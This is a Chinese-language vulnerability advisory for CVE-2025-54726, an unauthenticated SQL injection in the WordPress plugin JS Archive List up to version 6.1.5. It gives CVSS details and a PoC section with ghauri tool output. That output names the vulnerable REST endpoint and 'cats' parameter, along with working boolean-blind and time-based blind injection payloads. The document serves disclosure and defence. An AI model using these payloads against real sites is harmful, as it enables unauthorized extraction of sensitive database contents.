本文详细分析了WordPress插件JS Archive List 6.1.5及以下版本中存在的未授权SQL注入漏洞CVE-2025-54726。漏洞由于对用户输入参数过滤不严及SQL查询缺乏充分准备导致,攻击者可利用此漏洞提取数据库敏感信息。文章包含完整的漏洞描述、技术细节和PoC验证过程。
CVE-2025-54726
JS Archive List <= 6.1.5 - 未授权SQL注入漏洞
漏洞描述
WordPress的JS Archive List插件在所有6.1.5及以下版本中存在SQL注入漏洞,该漏洞由于对用户提供的参数转义不足以及现有SQL查询缺乏充分准备导致。这使得未授权攻击者能够向现有查询中附加额外的SQL查询,从而用于从数据库中提取敏感信息。
技术细节
- 类型: 插件漏洞
- 插件标识: jquery-archive-list-widget
- 受影响版本: 6.1.5
- CVSS评分: 7.5
- CVSS等级: 高危
- CVSS向量: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- CVE编号: CVE-2025-54726
- 状态: 活跃
PoC验证
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
ghauri -u "http://localhost/wp-json/jalw/v1/archive?cats=1&exclusionType=exclude"
________.__ .__ {1.4.1}
/ _____/| |__ _____ __ _________|__|
/ \ ___| | \\__ \ | | \_ __ \ |
\ \_\ \ Y \/ __ \| | /| | \/ |
\______ /___| (____ /____/ |__| |__|
\/ \/ \/ https://github.com/r0oth3x49
An advanced SQL injection detection & exploitation tool.
[*] 开始时间: 16:39:05 /2025-09-25/
[16:39:05] [INFO] 测试与目标URL的连接
Ghauri从存储的会话中恢复以下注入点:
---
参数: cats (GET)
类型: 基于布尔的盲注
标题: AND布尔盲注 - WHERE或HAVING子句
载荷: cats=1 AND 01609=1609&exclusionType=exclude
类型: 基于时间的盲注
标题: MySQL >= 5.0.12时间盲注 (IF - 注释)
载荷: cats=if(now()=sysdate(),SLEEP(5),0)&exclusionType=exclude
---
[16:39:05] [INFO] 测试MySQL
[16:39:05] [INFO] 确认MySQL
[16:39:06] [INFO] 后端数据库管理系统为MySQL
|